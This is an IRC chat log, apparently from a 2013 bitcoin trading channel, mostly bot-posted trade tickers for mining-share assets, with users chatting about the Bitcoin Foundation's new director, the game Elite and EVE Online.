[+] Jul 09 03:09:48 [BTCTC] [AMC-PT] 50 @ 0.002246 = 0.1123 BTC [+] Jul 09 03:09:52 [BTCTC] [AMC-PT] 900 @ 0.002246 = 2.0214 BTC [+] Jul 09 03:12:31 [BTCTC] [TAT.VIRTUALMINE] 136 @ 0.00473 = 0.6433 BTC [-] Jul 09 03:12:45 [BTCTC] [TAT.VIRTUALMINE] 292 @ 0.004729 = 1.3809 BTC [-] Jul 09 03:12:50 [BTCTC] [ASICMINER-PT] 1 @ 4.423999 BTC [-] Jul 09 03:15:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.043316 BTC [-] Jul 09 03:21:06 [BTCTC] [ASICMINER-PT] 1 @ 4.360001 BTC [-] Jul 09 03:25:33 [BTCTC] [S.DICE-PT] 40 @ 0.002389 = 0.0956 BTC [+] Jul 09 03:26:52 [BTCTC] [BASIC-MINING] 6 @ 0.2789 = 1.6734 BTC [-] Jul 09 03:28:22 [BTCTC] [TAT.ASICMINER] 5 @ 0.0433 = 0.2165 BTC [-] Jul 09 03:29:04 ThickAsThieves: https://bitfunder.com/asset/ActiveMining Jul 09 03:29:10 not "AM" Jul 09 03:29:16 [BTCTC] [BASIC-MINING] 4 @ 0.2789 = 1.1156 BTC [-] Jul 09 03:29:37 Lol wow Jul 09 03:29:49 [BTCTC] [TAT.ASICMINER] 2 @ 0.0433 = 0.0866 BTC [-] Jul 09 03:30:17 You try to say anything negative about AMC on reddit and you get down voted into oblivion Jul 09 03:30:25 lol Jul 09 03:30:58 it was Active Mining Cooperative, now it's just ActiveMining Jul 09 03:31:09 not much change there Jul 09 03:31:18 They're no longer cooperative hah Jul 09 03:36:31 [BTCTC] [BFMINES] 100 @ 0.004 = 0.4 BTC [+] Jul 09 03:46:23 [BTCTC] [AMC-PT] 6 @ 0.002246 = 0.0135 BTC [+] Jul 09 03:50:23 [BTCTC] [AMC-PT] 35 @ 0.002246 = 0.0786 BTC [+] Jul 09 03:52:58 [BTCTC] [TAT.ASICMINER] 43 @ 0.043001 = 1.849 BTC [-] Jul 09 03:53:47 [BTCTC] [BASIC-MINING] 6 @ 0.279 = 1.674 BTC [+] Jul 09 03:54:45 [BTCTC] [AMC-PT] 75 @ 0.002246 = 0.1685 BTC [+] Jul 09 03:58:02 [BTCTC] [TAT.VIRTUALMINE] 2996 @ 0.004729 = 14.1681 BTC [-] Jul 09 04:07:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.0433 BTC [+] Jul 09 04:09:07 [BTCTC] [AMC-PT] 142 @ 0.002246 = 0.3189 BTC [+] Jul 09 04:09:20 [BTCTC] [AMC-PT] 153 @ 0.002246 = 0.3436 BTC [+] Jul 09 04:09:50 [BTCTC] [BASIC-MINING] 1 @ 0.279 BTC [+] Jul 09 04:10:58 [BTCTC] [BASIC-MINING] 10 @ 0.251001 = 2.51 BTC [-] Jul 09 04:11:35 You try to say anything negative about AMC on reddit and you get down voted into oblivion <<< reddit is dumb. Jul 09 04:12:13 [BTCTC] [BASIC-MINING] 3 @ 0.251001 = 0.753 BTC [-] Jul 09 04:12:19 [BTCTC] [AMC-PT] 67 @ 0.002246 = 0.1505 BTC [+] Jul 09 04:13:18 [BTCTC] [BASIC-MINING] 12 @ 0.279 = 3.348 BTC [+] Jul 09 04:13:32 [BTCTC] [S.DICE-PT] 139 @ 0.002389 = 0.3321 BTC [+] Jul 09 04:13:34 [BTCTC] [AMC-PT] 50 @ 0.002248 = 0.1124 BTC [+] Jul 09 04:13:35 [BTCTC] [S.DICE-PT] 20 @ 0.002277 = 0.0455 BTC [-] Jul 09 04:13:36 [BTCTC] [AMC-PT] 90 @ 0.002249 = 0.2024 BTC [+] Jul 09 04:13:37 [BTCTC] [S.DICE-PT] 100 @ 0.002265 = 0.2265 BTC [-] Jul 09 04:13:39 [BTCTC] [S.DICE-PT] 70 @ 0.00225 = 0.1575 BTC [-] Jul 09 04:13:40 [BTCTC] [S.DICE-PT] 25 @ 0.00222 = 0.0555 BTC [-] Jul 09 04:13:42 [BTCTC] [S.DICE-PT] 1 @ 0.0022 BTC [-] Jul 09 04:13:43 [BTCTC] [S.DICE-PT] 1 @ 0.0022 BTC [-] Jul 09 04:13:44 [BTCTC] [S.DICE-PT] 50 @ 0.0022 = 0.11 BTC [-] Jul 09 04:13:45 [BTCTC] [S.DICE-PT] 10 @ 0.00219 = 0.0219 BTC [-] Jul 09 04:13:45 [BTCTC] [S.DICE-PT] 135 @ 0.002185 = 0.295 BTC [-] Jul 09 04:13:46 Ah, some S.DICE... Jul 09 04:13:46 [BTCTC] [S.DICE-PT] 200 @ 0.002175 = 0.435 BTC [-] Jul 09 04:13:47 [BTCTC] [S.DICE-PT] 25 @ 0.002151 = 0.0538 BTC [-] Jul 09 04:13:48 [BTCTC] [S.DICE-PT] 200 @ 0.00215 = 0.43 BTC [-] Jul 09 04:13:50 [BTCTC] [S.DICE-PT] 100 @ 0.00215 = 0.215 BTC [-] Jul 09 04:13:51 [BTCTC] [S.DICE-PT] 250 @ 0.00211 = 0.5275 BTC [-] Jul 09 04:13:52 [BTCTC] [S.DICE-PT] 400 @ 0.00211 = 0.844 BTC [-] Jul 09 04:13:54 [BTCTC] [S.DICE-PT] 3000 @ 0.0021 = 6.3 BTC [-] Jul 09 04:13:55 [BTCTC] [S.DICE-PT] 485 @ 0.00206 = 0.9991 BTC [-] Jul 09 04:13:56 [BTCTC] [S.DICE-PT] 128 @ 0.002055 = 0.263 BTC [-] Jul 09 04:13:57 [BTCTC] [S.DICE-PT] 50 @ 0.00204 = 0.102 BTC [-] Jul 09 04:13:58 [BTCTC] [S.DICE-PT] 300 @ 0.002035 = 0.6105 BTC [-] Jul 09 04:13:59 [BTCTC] [S.DICE-PT] 500 @ 0.002016 = 1.008 BTC [-] Jul 09 04:14:01 [BTCTC] [S.DICE-PT] 200 @ 0.002016 = 0.4032 BTC [-] Jul 09 04:14:02 [BTCTC] [BASIC-MINING] 3 @ 0.2799 = 0.8397 BTC [+] Jul 09 04:14:03 [BTCTC] [S.DICE-PT] 200 @ 0.002005 = 0.401 BTC [-] Jul 09 04:14:05 [BTCTC] [S.DICE-PT] 2000 @ 0.002 = 4 BTC [-] Jul 09 04:14:06 [BTCTC] [S.DICE-PT] 17 @ 0.002 = 0.034 BTC [-] Jul 09 04:14:26 [BTCTC] [AMC-PT] 250 @ 0.00225 = 0.5625 BTC [+] Jul 09 04:14:27 [BTCTC] [AMC-PT] 300 @ 0.00225 = 0.675 BTC [+] Jul 09 04:15:21 [HAVELOCK] [ASICM] 1 @ 0.043 BTC [+] Jul 09 04:15:29 [BTCTC] [AMC-PT] 100 @ 0.002295 = 0.2295 BTC [+] Jul 09 04:15:47 [BTCTC] [AMC-PT] 15 @ 0.002296 = 0.0344 BTC [+] Jul 09 04:15:55 [BTCTC] [AMC-PT] 1 @ 0.002296 BTC [+] Jul 09 04:16:11 [BTCTC] [AMC-PT] 84 @ 0.002296 = 0.1929 BTC [+] Jul 09 04:16:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.043001 BTC [-] Jul 09 04:16:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.043001 BTC [-] Jul 09 04:16:44 [BTCTC] [BITVPS] 25 @ 0.002198 = 0.055 BTC [-] Jul 09 04:17:24 [BTCTC] [AMC-PT] 10 @ 0.0023 = 0.023 BTC [+] Jul 09 04:17:43 [BTCTC] [AMC-PT] 46 @ 0.00235 = 0.1081 BTC [+] Jul 09 04:17:52 http://www.coindesk.com/firmcoin-the-reprogrammable-physical-bitcoin-token-explained/ Jul 09 04:18:11 Q. Why do you think there is a need for physical bitcoins? Jul 09 04:18:22 - You may be too drunk to operate a hardware wallet properly! Jul 09 04:18:31 [BTCTC] [AMC-PT] 37 @ 0.00235 = 0.087 BTC [+] Jul 09 04:18:32 ^science Jul 09 04:19:49 [BTCTC] [AMC-PT] 717 @ 0.00235 = 1.685 BTC [+] Jul 09 04:19:51 [BTCTC] [AMC-PT] 200 @ 0.0024 = 0.48 BTC [+] Jul 09 04:19:52 [BTCTC] [AMC-PT] 253 @ 0.0024 = 0.6072 BTC [+] Jul 09 04:20:06 [BTCTC] [BASIC-MINING] 1 @ 0.251001 BTC [-] Jul 09 04:20:41 [HAVELOCK] [ASICM] 9 @ 0.043092 = 0.3878 BTC [+] Jul 09 04:24:19 [BTCTC] [AMC-PT] 300 @ 0.0024 = 0.72 BTC [+] Jul 09 04:26:12 https://bitcoinfoundation.org/blog/?p=214 Jul 09 04:26:14 Bitcoin Foundation: Blog Jul 09 04:26:21 "Announcing Jon Matonis as Executive Director" Jul 09 04:27:00 [BTCTC] [GSDPT] 25 @ 0.002374 = 0.0594 BTC [+] Jul 09 04:30:45 [BTCTC] [DMS.SELLING] 7 @ 0.030002 = 0.21 BTC [-] Jul 09 04:30:48 [BTCTC] [DMS.SELLING] 1 @ 0.030001 BTC [-] Jul 09 04:30:55 [BTCTC] [DMS.SELLING] 1 @ 0.030001 BTC [-] Jul 09 04:30:57 [BTCTC] [DMS.SELLING] 10 @ 0.030001 = 0.3 BTC [-] Jul 09 04:30:59 [BTCTC] [DMS.SELLING] 2 @ 0.03 = 0.06 BTC [-] Jul 09 04:31:49 [BTCTC] [DMS.PURCHASE] 105 @ 0.048997 = 5.1447 BTC [+] Jul 09 04:39:30 [BTCTC] [AMC-PT] 223 @ 0.0024 = 0.5352 BTC [+] Jul 09 04:48:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.04326 BTC [+] Jul 09 04:48:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.04326 BTC [+] Jul 09 04:58:19 [BTCTC] [BASIC-MINING] 1 @ 0.251001 BTC [-] Jul 09 05:02:15 [HAVELOCK] [ASICM] 1 @ 0.043091 BTC [-] Jul 09 05:04:19 [HAVELOCK] [ASICM] 2 @ 0.043091 = 0.0862 BTC [-] Jul 09 05:05:17 [HAVELOCK] [ASICM] 1 @ 0.042582 BTC [-] Jul 09 05:05:19 [HAVELOCK] [ASICM] 81 @ 0.042581 = 3.4491 BTC [-] Jul 09 05:05:20 [HAVELOCK] [ASICM] 80 @ 0.04258 = 3.4064 BTC [-] Jul 09 05:05:21 [HAVELOCK] [ASICM] 23 @ 0.0425 = 0.9775 BTC [-] Jul 09 05:05:22 [HAVELOCK] [ASICM] 4 @ 0.042204 = 0.1688 BTC [-] Jul 09 05:05:55 [HAVELOCK] [ASICM] 1 @ 0.042 BTC [-] Jul 09 05:07:17 [BTCTC] [GSDPT] 2 @ 0.002011 = 0.004 BTC [-] Jul 09 05:22:14 better him than Veneses Jul 09 05:25:32 [BTCTC] [BTC-BOND] 2 @ 0.009998 = 0.02 BTC [+] Jul 09 05:25:43 ;;ticker Jul 09 05:25:43 MtGox BTCUSD ticker | Best bid: 75.81001, Best ask: 76.00000, Bid-ask spread: 0.18999, Last trade: 75.94753, 24 hour volume: 51588.93810261, 24 hour low: 72.46000, 24 hour high: 80.00000, 24 hour vwap: 77.04230 Jul 09 05:25:50 see, I told you I fixed it Jul 09 05:26:18 thx man! Jul 09 05:26:25 fix it to about 85 Jul 09 05:26:31 plz Jul 09 05:26:45 we're probably going to $500 from here Jul 09 05:28:25 lettuce try and not exaggerate. Jul 09 05:29:30 [BTCTC] [ASICMINER-PT] 1 @ 4.419899 BTC [+] Jul 09 05:31:32 I love IT Jul 09 05:31:57 dub: so how do I request rights to update java etc Jul 09 05:32:08 IT: which java version do you require Jul 09 05:32:21 dub: one that is not a gaping security hole Jul 09 05:32:35 IT: I'm sorry that is not a valid business need Jul 09 05:33:14 Aren't all versions gaping security holes? Jul 09 05:35:24 [BTCTC] [TAT.ASICMINER] 23 @ 0.04331 = 0.9961 BTC [+] Jul 09 05:37:46 http://trilema.com/2013/have-you-played-elite-back-in-the-80s/ Jul 09 05:37:49 Have you played Elite back in the 80s ? pe Trilema - Un blog de Mircea Popescu. Jul 09 05:38:04 ahaha bash it dub Jul 09 05:41:01 is this part of your research or are you a long-time Eve player? Jul 09 05:42:54 [BTCTC] [AMC-PT] 200 @ 0.0024 = 0.48 BTC [+] Jul 09 05:42:56 [BTCTC] [AMC-PT] 250 @ 0.0024 = 0.6 BTC [+] Jul 09 05:43:15 [HAVELOCK] [ASICM] 1 @ 0.04199 BTC [-] Jul 09 05:43:16 [HAVELOCK] [ASICM] 119 @ 0.041999 = 4.9979 BTC [+] Jul 09 05:43:18 [HAVELOCK] [ASICM] 72 @ 0.042 = 3.024 BTC [+] Jul 09 05:43:22 TaT Jul 09 05:43:38 It's part of his http://cdn.meme.li/instances/300x300/27068938.jpg research program Jul 09 05:50:50 ThickAsThieves not really part of either, just stumbled into it. Jul 09 05:51:41 i was explaining how the death is supposed to work, person went "sounds like improved EVE" i was wtf is eve and so... Jul 09 05:51:56 [BTCTC] [ASICMINER-PT] 1 @ 4.419899 BTC [+] Jul 09 05:54:13 ive considered trying it a few time sover the years Jul 09 05:54:27 trying a game is a big decision for me Jul 09 05:54:43 it turns into sucha timesuck Jul 09 05:54:45 [HAVELOCK] [ASICM] 10 @ 0.042 = 0.42 BTC [+] Jul 09 05:54:58 and I already have so many projects that I should know better than to game Jul 09 05:55:22 i didnt play for years after I quit WoW Jul 09 05:55:27 video games will suck the life out of you Jul 09 05:55:27 it is actuyally very easy going Jul 09 05:55:35 then i said fuckit and played Skyrim Jul 09 05:55:41 i'm playing atm. it's a window minimized on autopilot Jul 09 05:55:43 for 100 hours... Jul 09 05:55:45 sometimes i mine on the same prionciple Jul 09 05:56:33 then i quit that and played Dishonored for a while, luckily it just wasn't as addictive Jul 09 05:56:36 ozbot: Elite was my fav in the 1980s you can still find the music from it online i love it still Jul 09 05:56:52 The Elite universe contains eight galaxies, each galaxy containing 256 planets to explore. Due to the limited capabilities of 8-bit computers, these worlds are procedurally generated. A single seed number is run through a fixed algorithm the appropriate number of times and creates a sequence of numbers determining each planet's complete composition (position in the galaxy, prices of commodities, and even name and local Jul 09 05:56:52 details— text strings are chosen numerically from a lookup table and assembled to produce unique descriptions for each planet). This means that no extra memory is needed to store the characteristics of each planet, yet each is unique and has fixed properties. Each galaxy is also procedurally generated from the first. Jul 09 05:56:53 you are talking to a bot Jul 09 05:56:59 that shit. that;'s what coding means. Jul 09 05:57:05 they packed a playable game in 16k Jul 09 05:57:19 mp just wants to take the title of biggest eve ponzi Jul 09 05:57:27 woa what are shot screenshots Jul 09 05:57:36 fu dub AND YOUR FUD Jul 09 05:58:36 [HAVELOCK] [ASICM] 4 @ 0.042 = 0.168 BTC [+] Jul 09 06:01:23 [HAVELOCK] [ASICM] 5 @ 0.042 = 0.21 BTC [+] Jul 09 06:02:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.0433 = 0.0866 BTC [-] Jul 09 06:02:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.043001 BTC [-] Jul 09 06:02:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.043001 BTC [-] Jul 09 06:02:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.043001 BTC [-] Jul 09 06:02:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.043001 BTC [-] Jul 09 06:02:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.043001 BTC [-] Jul 09 06:02:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.043001 BTC [-] Jul 09 06:02:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.043001 BTC [-] Jul 09 06:02:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.043001 BTC [-] Jul 09 06:02:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.043001 BTC [-] Jul 09 06:02:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.043001 BTC [-] Jul 09 06:02:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.043001 BTC [-] Jul 09 06:02:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.043001 BTC [-] Jul 09 06:02:54 [BTCTC] [TAT.ASICMINER] 20 @ 0.043 = 0.86 BTC [-] Jul 09 06:02:55 [BTCTC] [TAT.ASICMINER] 30 @ 0.043 = 1.29 BTC [-] Jul 09 06:02:58 [HAVELOCK] [ASICM] 235 @ 0.042 = 9.87 BTC [+] Jul 09 06:03:07 i swear that's not me making the 1-share orders Jul 09 06:03:15 hehe Jul 09 06:03:36 nice way to spam the channel though Jul 09 06:03:51 maybe it's a result of BTCT adding a live ticker Jul 09 06:03:56 to their page Jul 09 06:03:58 [BTCTC] [AMC-PT] 2 @ 0.0024 = 0.0048 BTC [+] Jul 09 06:09:56 [HAVELOCK] [ASICM] 1 @ 0.0416 BTC [-] Jul 09 06:09:57 [HAVELOCK] [ASICM] 1 @ 0.04141 BTC [-] Jul 09 06:09:58 [HAVELOCK] [ASICM] 1 @ 0.041001 BTC [-] Jul 09 06:09:59 [HAVELOCK] [ASICM] 1 @ 0.041 BTC [-] Jul 09 06:10:00 [HAVELOCK] [ASICM] 1 @ 0.04090106 BTC [-] Jul 09 06:10:01 [HAVELOCK] [ASICM] 5 @ 0.0408 = 0.204 BTC [-] Jul 09 06:13:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.0429 BTC [-] Jul 09 06:13:48 [BTCTC] [TAT.ASICMINER] 15 @ 0.04212 = 0.6318 BTC [-] Jul 09 06:13:50 [BTCTC] [TAT.ASICMINER] 10 @ 0.042006 = 0.4201 BTC [-] Jul 09 06:16:03 [BTCTC] [AMC-PT] 165 @ 0.0024 = 0.396 BTC [+] Jul 09 06:19:50 mircea popescu: was that some version of elite? I used to play Elite on the commodore64 and it was ahead of its time back then. Jul 09 06:21:29 oh thats eve Jul 09 06:21:48 [BTCTC] [DMS.MINING] 1 @ 0.019499 BTC [-] Jul 09 06:23:17 [BTCTC] [DMS.MINING] 11 @ 0.0195 = 0.2145 BTC [+] Jul 09 06:24:21 [BTCTC] [ASICMINER-PT] 1 @ 4.4199 BTC [+] Jul 09 06:24:23 [BTCTC] [ASICMINER-PT] 2 @ 4.42 = 8.84 BTC [+] Jul 09 06:24:25 [BTCTC] [ASICMINER-PT] 1 @ 4.42298 BTC [+] Jul 09 06:24:27 [BTCTC] [ASICMINER-PT] 2 @ 4.422998 = 8.846 BTC [+] Jul 09 06:25:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.04226 BTC [+] Jul 09 06:25:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.04226 BTC [+] Jul 09 06:25:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.04226 BTC [+] Jul 09 06:25:53 my fav https://www.youtube.com/watch?v=4lKKy3l_5YI Jul 09 06:27:51 [BTCTC] [ASICMINER-PT] 1 @ 4.423 BTC [+] Jul 09 06:27:53 [BTCTC] [ASICMINER-PT] 1 @ 4.423 BTC [+] Jul 09 06:27:55 [BTCTC] [ASICMINER-PT] 1 @ 4.424991 BTC [+] Jul 09 06:27:57 [BTCTC] [ASICMINER-PT] 2 @ 4.425 = 8.85 BTC [+] Jul 09 06:28:03 tyea. Jul 09 06:28:44 [HAVELOCK] [ASICM] 1 @ 0.0415 BTC [+] Jul 09 06:33:09 Official ASICMINER Update: https://bitcointalk.org/index.php?topic=99497.msg2687050#msg2687050 Jul 09 06:37:22 [BTCTC] [ASICMINER-PT] 1 @ 4.45 BTC [+] Jul 09 06:37:42 TAT is a board member, hide your wife, sell your shares Jul 09 06:37:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.042261 BTC [+] Jul 09 06:37:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.042261 BTC [+] Jul 09 06:37:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.042261 BTC [+] Jul 09 06:37:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.042261 BTC [+] Jul 09 06:37:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.042261 BTC [+] Jul 09 06:37:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.042261 BTC [+] Jul 09 06:37:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.042261 BTC [+] Jul 09 06:37:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.042263 BTC [+] Jul 09 06:37:57 [BTCTC] [TAT.ASICMINER] 15 @ 0.043299 = 0.6495 BTC [+] Jul 09 06:37:59 [BTCTC] [TAT.ASICMINER] 60 @ 0.04331 = 2.5986 BTC [+] Jul 09 06:38:00 [HAVELOCK] [ASICM] 158 @ 0.042 = 6.636 BTC [+] Jul 09 06:38:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.043316 BTC [+] Jul 09 06:38:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.043316 BTC [+] Jul 09 06:38:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.043316 BTC [+] Jul 09 06:38:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.043316 BTC [+] Jul 09 06:38:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.043316 BTC [+] Jul 09 06:38:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.043316 BTC [+] Jul 09 06:38:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.043316 BTC [+] Jul 09 06:38:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.043316 BTC [+] Jul 09 06:38:12 [HAVELOCK] [ASICM] 1 @ 0.0426999 BTC [+] Jul 09 06:38:13 [HAVELOCK] [ASICM] 2 @ 0.04298 = 0.086 BTC [+] Jul 09 06:38:14 [HAVELOCK] [ASICM] 5 @ 0.04299 = 0.215 BTC [+] Jul 09 06:38:15 [HAVELOCK] [ASICM] 1 @ 0.043094 BTC [+] Jul 09 06:38:17 [HAVELOCK] [ASICM] 78 @ 0.04309999 = 3.3618 BTC [+] Jul 09 06:38:18 [HAVELOCK] [ASICM] 13 @ 0.0431 = 0.5603 BTC [+] Jul 09 06:38:43 [BTCTC] [S.DICE-PT] 100 @ 0.002394 = 0.2394 BTC [+] Jul 09 06:40:56 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.004744 = 0.0142 BTC [+] Jul 09 06:46:04 [BTCTC] [AMC-PT] 7 @ 0.0024 = 0.0168 BTC [+] Jul 09 06:47:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.04252 BTC [-] Jul 09 06:54:31 [BTCTC] [BASIC-MINING] 10 @ 0.279899 = 2.799 BTC [+] Jul 09 06:54:33 [BTCTC] [BASIC-MINING] 37 @ 0.2799 = 10.3563 BTC [+] Jul 09 06:57:28 I like matonis as the new foundation director Jul 09 06:57:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.0423 = 0.423 BTC [-] Jul 09 06:57:47 Makes foundation appear less scammish Jul 09 06:57:54 [BTCTC] [ASICMINER-PT] 1 @ 4.45 BTC [+] Jul 09 06:58:03 or does it make matonis look more scammish? Jul 09 06:58:05 :) Jul 09 06:58:13 Boom right Jul 09 06:59:00 After the goc coinlab lawsuit we exchanged some words on g+ Jul 09 06:59:21 Nice to see what those words meant now Jul 09 06:59:25 [HAVELOCK] [ASICM] 2 @ 0.043 = 0.086 BTC [-] Jul 09 06:59:50 [BTCTC] [TAT.ASICMINER] 3 @ 0.0423 = 0.1269 BTC [-] Jul 09 06:59:53 My gist was the fighting factions needed to be less public ;) Jul 09 07:00:01 Or gone Jul 09 07:00:24 you gist on matonis Jul 09 07:00:36 did he receive your gist well? Jul 09 07:00:52 He followed me first Jul 09 07:01:00 So fuck if i care Jul 09 07:01:03 only to get your gist Jul 09 07:01:09 I was respectful Jul 09 07:01:11 all over is face Jul 09 07:01:13 his* Jul 09 07:01:29 Why are you gisting my gist Jul 09 07:02:23 [BTCTC] [AMC-PT] 50 @ 0.00234 = 0.117 BTC [-] Jul 09 07:03:34 I'm not the one gistign all over matonis Jul 09 07:04:18 [BTCTC] [AMC-PT] 8 @ 0.00234 = 0.0187 BTC [-] Jul 09 07:05:04 [HAVELOCK] [SDICE] 1 @ 0.18900101 BTC [-] Jul 09 07:06:01 [BTCTC] [ASICMINER-PT] 1 @ 4.370001 BTC [-] Jul 09 07:06:03 [BTCTC] [ASICMINER-PT] 1 @ 4.37 BTC [-] Jul 09 07:06:05 [BTCTC] [ASICMINER-PT] 1 @ 4.355018 BTC [-] Jul 09 07:06:06 [HAVELOCK] [ASICM] 37 @ 0.04309999 = 1.5947 BTC [+] Jul 09 07:06:08 [BTCTC] [ASICMINER-PT] 1 @ 4.355017 BTC [-] Jul 09 07:06:09 [BTCTC] [ASICMINER-PT] 1 @ 4.355001 BTC [-] Jul 09 07:06:25 [HAVELOCK] [SDICE] 2 @ 0.189 = 0.378 BTC [-] Jul 09 07:06:32 [HAVELOCK] [ASICM] 13 @ 0.0431 = 0.5603 BTC [+] Jul 09 07:06:39 [BTCTC] [ASICMINER-PT] 1 @ 4.489999 BTC [+] Jul 09 07:06:55 [HAVELOCK] [ASICM] 600 @ 0.0431 = 25.86 BTC [+] Jul 09 07:07:26 [HAVELOCK] [ASICM] 13 @ 0.04309999 = 0.5603 BTC [-] Jul 09 07:07:28 [BTCTC] [TAT.ASICMINER] 20 @ 0.0444 = 0.888 BTC [+] Jul 09 07:07:51 [BTCTC] [TAT.ASICMINER] 24 @ 0.044564 = 1.0695 BTC [+] Jul 09 07:07:53 [BTCTC] [TAT.ASICMINER] 4 @ 0.044564 = 0.1783 BTC [+] Jul 09 07:08:07 [BTCTC] [BASIC-MINING] 2 @ 0.287998 = 0.576 BTC [+] Jul 09 07:08:09 [BTCTC] [BASIC-MINING] 4 @ 0.287999 = 1.152 BTC [+] Jul 09 07:08:10 [BTCTC] [BASIC-MINING] 20 @ 0.288 = 5.76 BTC [+] Jul 09 07:08:11 [BTCTC] [BASIC-MINING] 3 @ 0.289 = 0.867 BTC [+] Jul 09 07:08:13 [BTCTC] [BASIC-MINING] 1 @ 0.289726 BTC [+] Jul 09 07:08:14 [BTCTC] [BASIC-MINING] 30 @ 0.289999 = 8.7 BTC [+] Jul 09 07:08:27 [BTCTC] [TAT.ASICMINER] 13 @ 0.0447 = 0.5811 BTC [+] Jul 09 07:08:44 [BTCTC] [TAT.ASICMINER] 10 @ 0.0448 = 0.448 BTC [+] Jul 09 07:09:32 [BTCTC] [TAT.ASICMINER] 5 @ 0.044899 = 0.2245 BTC [+] Jul 09 07:10:21 [MPEX] [S.MPOE] 13300 @ 0.00078906 = 10.4945 BTC [-] Jul 09 07:11:06 [HAVELOCK] [SDICE] 8 @ 0.189 = 1.512 BTC [-] Jul 09 07:11:16 [HAVELOCK] [SDICE] 1 @ 0.18500202 BTC [-] Jul 09 07:11:39 [HAVELOCK] [ASICM] 100 @ 0.0431 = 4.31 BTC [+] Jul 09 07:11:50 [HAVELOCK] [ASICM] 2 @ 0.0431 = 0.0862 BTC [+] Jul 09 07:11:54 [HAVELOCK] [ASICM] 75 @ 0.0431 = 3.2325 BTC [+] Jul 09 07:12:00 [HAVELOCK] [ASICM] 44 @ 0.0431 = 1.8964 BTC [+] Jul 09 07:13:06 [HAVELOCK] [ASICM] 1 @ 0.044498 BTC [+] Jul 09 07:13:28 [HAVELOCK] [ASICM] 1 @ 0.044498 BTC [+] Jul 09 07:13:28 [HAVELOCK] [ASICM] 1 @ 0.044499 BTC [+] Jul 09 07:20:02 [MPEX] [S.MPOE] 12500 @ 0.00079355 = 9.9194 BTC [+] Jul 09 07:20:17 [HAVELOCK] [ASICM] 29 @ 0.0441 = 1.2789 BTC [-] Jul 09 07:21:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.044899 BTC [+] Jul 09 07:21:44 [HAVELOCK] [ASICM] 3 @ 0.0441 = 0.1323 BTC [-] Jul 09 07:21:57 [BTCTC] [BASIC-MINING] 1 @ 0.2899 BTC [-] Jul 09 07:23:35 [BTCTC] [TAT.ASICMINER] 6 @ 0.044899 = 0.2694 BTC [+] Jul 09 07:26:50 [BTCTC] [AMC-PT] 90 @ 0.002201 = 0.1981 BTC [-] Jul 09 07:27:30 [BTCTC] [BASIC-MINING] 1 @ 0.2899 BTC [-] Jul 09 07:29:21 [BTCTC] [TAT.ASICMINER] 6 @ 0.044899 = 0.2694 BTC [+] Jul 09 07:30:25 [BTCTC] [BITVPS] 250 @ 0.002001 = 0.5003 BTC [-] Jul 09 07:30:29 [BTCTC] [AMC-PT] 500 @ 0.0022 = 1.1 BTC [-] Jul 09 07:31:12 [BTCTC] [BASIC-MINING] 4 @ 0.2899 = 1.1596 BTC [-] Jul 09 07:31:29 [BTCTC] [BASIC-MINING] 3 @ 0.2899 = 0.8697 BTC [-] Jul 09 07:33:02 [BTCTC] [BITVPS] 250 @ 0.002001 = 0.5003 BTC [-] Jul 09 07:33:04 [BTCTC] [BITVPS] 3 @ 0.002 = 0.006 BTC [-] Jul 09 07:33:05 [BTCTC] [BITVPS] 215 @ 0.001999 = 0.4298 BTC [-] Jul 09 07:33:35 [BTCTC] [BASIC-MINING] 1 @ 0.2899 BTC [-] Jul 09 07:34:02 [BTCTC] [BASIC-MINING] 2 @ 0.289999 = 0.58 BTC [+] Jul 09 07:37:50 [BTCTC] [TAT.ASICMINER] 6 @ 0.044899 = 0.2694 BTC [+] Jul 09 07:37:51 [BTCTC] [AMC-PT] 90 @ 0.00233 = 0.2097 BTC [+] Jul 09 07:37:52 [BTCTC] [TAT.ASICMINER] 8 @ 0.044899 = 0.3592 BTC [+] Jul 09 07:38:35 [BTCTC] [TAT.ASICMINER] 25 @ 0.045 = 1.125 BTC [+] Jul 09 07:38:40 [BTCTC] [TAT.ASICMINER] 5 @ 0.045 = 0.225 BTC [+] Jul 09 07:38:42 [BTCTC] [TAT.ASICMINER] 8 @ 0.045 = 0.36 BTC [+] Jul 09 07:39:20 [HAVELOCK] [ASICM] 22 @ 0.0445 = 0.979 BTC [+] Jul 09 07:40:33 [HAVELOCK] [ASICM] 3 @ 0.0445 = 0.1335 BTC [+] Jul 09 